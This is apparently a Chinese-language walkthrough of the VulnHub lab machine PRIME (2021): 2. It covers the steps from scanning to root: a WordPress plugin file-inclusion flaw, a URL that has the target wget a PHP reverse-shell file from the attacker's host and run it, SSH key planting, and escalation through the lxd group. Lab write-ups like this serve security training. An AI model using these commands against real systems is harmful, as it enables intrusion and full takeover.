Vulnhub_PRIME (2021): 2

主機資訊

kali: 192.168.254.165
PRIME (2021)_2：192.168.254.166
           

資訊收集

通過nmap掃描目标主機發現開放22、80、139、445、10123端口，并且10123使用python搭建http

nmap -T4 -A -v -p- 192.168.254.166
           

打開80端口的頁面發現是一個介紹頁面

檢視源碼也沒有發現有價值的資訊

通路10123端口發現應該是某個使用者的家目錄

我們将所有檔案下載下傳下來進行檢視

在something檔案中發下一些提示

通過目錄掃描發現一個wordpress的站點和一個server目錄

檢視wp目錄

檢視server目錄

下載下傳server目錄下的檔案，解壓後發現是一套網站的源碼

使用wpscan得到一個使用者名admin

wpscan --url http://192.168.254.166/wp/ --enumerate
           

在使用wpscan api-token後再次進行掃描發現存在一個LFI漏洞

wpscan --url http://192.168.254.166/wp/ -e --api-token CPW3*********************************ZkfaXk
           

利用方法

檢視passwd

view-source:http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
           

GETSHELL

然後通路最開始在10123端口中發現的shell.php檔案，并且可以執行指令

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id
           

使用shell.php執行指令将反彈shell的檔案下載下傳到目标主機

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=wget%20http://192.168.254.165:8888/php_re_shell.php%20-O%20/tmp/shell.php
           

使用php執行上傳的檔案反彈回一個shell

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=php%20/tmp/shell.php
           

使用python擷取一個互動式shell

python3 -c 'import pty; pty.spawn("/bin/bash");'
           

檢視wordpress的配置檔案得到資料庫密碼

使用nume4linnux對smb進行掃描發現一個share

enum4linux -A 192.168.254.166
           

使用smbclient進行連接配接

smbclient //192.168.254.166/welcome
           

建立ssh公鑰

ssh-keygen -b 2048
           

将id_rsa.pub複制到tmp目錄下命名位authorized_keys

将authorized_keys上傳到目标主機的.ssh目錄下

然後使用ssh登入到目标主機

檢視使用者id發現jarves還屬于lxd組

首先我們從github下載下傳建構好的Alpine,然後進行執行

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
           

提權

然後我們将生成的檔案上傳至目标機器

wget http://192.168.254.165:8889/alpine-v3.13-x86_64-20210529_0640.tar.gz
           

使用lxd進行初始化

lxd init
           

然後導入鏡像

lxc image import ./alpine-v3.13-x86_64-20210529_0640.tar.gz  --alias myimage
           

檢視鏡像

lxc image list
           

進入到容器的指令行

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
           

進入mnt/root目錄，這個目錄包含所有主控端檔案

替換root目錄下的authorized_keys檔案

最後使用ssh連接配接拿到root權限

加入我的星球

下方檢視曆史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 漢化破解版

通達OA任意上傳&檔案包含漏洞複現

掃描二維碼

擷取更多精彩

NowSec